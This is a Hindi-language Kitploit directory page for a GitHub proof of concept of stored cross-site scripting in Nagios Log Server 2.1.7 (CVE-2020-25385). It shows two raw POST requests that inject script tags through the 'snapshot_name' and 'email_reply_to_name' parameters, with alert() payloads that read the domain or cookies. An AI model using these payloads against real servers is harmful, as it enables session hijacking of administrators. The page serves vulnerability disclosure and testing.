Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting — Nagios Log Server 2.1.7 में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) के परिणामस्वरूप हमलावर उन उपयोगकर्ताओं पर दुर्भावनापूर्ण कार्य कर सकता है जो दुर्भावनापूर्ण रूप से तैयार किया गया लिंक या तृतीय-पक्ष वेब पेज खोलते हैं। | Kitploit
उपकरण/GitHubGitHub/emreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubemreovunc/nagios-log-server-2.1.7-persistent-cross-site-scripting

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Nagios Log Server 2.1.7 में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) के परिणामस्वरूप हमलावर उन उपयोगकर्ताओं पर दुर्भावनापूर्ण कार्य कर सकता है जो दुर्भावनापूर्ण रूप से तैयार किया गया लिंक या तृतीय-पक्ष वेब पेज खोलते हैं।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
325 साल पहलेअभी तक समीक्षित नहीं

Nagios-Log-Server-2.1.7-Persistent-Cross-Site-Scripting

Nagios Log Server 2.1.7 में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) के परिणामस्वरूप एक हमलावर उन उपयोगकर्ताओं पर दुर्भावनापूर्ण कार्य कर सकता है जो किसी दुर्भावनापूर्ण तरीके से तैयार लिंक या तृतीय-पक्ष वेब पेज खोलते हैं।

Nagios Log Server 2.1.7 और इससे पुराने संस्करण इन भेद्यताओं से प्रभावित हैं।

CVE-2020-25385

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25385

PoC-1

भेद्यता का शोषण करने के लिए, कोई व्यक्ति अनुरोध निकाय में 'snapshot_name' पैरामीटर में हेरफेर करके '/nagioslogserver/configure/create_snapshot' पर POST अनुरोध का उपयोग कर सकता है, ताकि उन उपयोगकर्ताओं को प्रभावित किया जा सके जो किसी दुर्भावनापूर्ण तरीके से तैयार लिंक या तृतीय-पक्ष वेब पेज खोलते हैं।

root@kitploit:~
POST /nagioslogserver/configure/create_snapshot HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
DNT: 1
Connection: close
Cookie: csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd; ls_session=883lergotgcjbh9bjgaeakosv5go2gbb; PHPSESSID=nbah0vkmibpudd1qh7qgnpgo53
Upgrade-Insecure-Requests: 1

csrf_ls=b3bef5c1a2ef6e4c233282d1c1c229fd&snapshot_name=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E

PoC-2

भेद्यता का शोषण करने के लिए, कोई व्यक्ति अनुरोध निकाय में 'email_reply_to_name' पैरामीटर में हेरफेर करके '/nagioslogserver/admin/mail' पर POST अनुरोध का उपयोग कर सकता है, ताकि उन उपयोगकर्ताओं को प्रभावित किया जा सके जो किसी दुर्भावनापूर्ण तरीके से तैयार लिंक या तृतीय-पक्ष वेब पेज खोलते हैं।

root@kitploit:~
POST /nagioslogserver/admin/mail HTTP/1.1
Host: [TARGET]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:82.0) Gecko/20100101 Firefox/82.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 291
DNT: 1
Connection: close
Cookie: csrf_ls=6e418c757282ab5c4785dad327238158; ls_session=pscogfricmnpe9kpvbtcuccn8mfempgp
Upgrade-Insecure-Requests: 1

csrf_ls=6e418c757282ab5c4785dad327238158&email_from_name=Nagios+Log+Server&email_from=root%40localhost&email_reply_to_name=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email_reply_to=root%40localhost&email_method=mail&smtp_host=&smtp_crypto=&smtp_port=25&smtp_user=&smtp_pass=

टूल डाउनलोड करें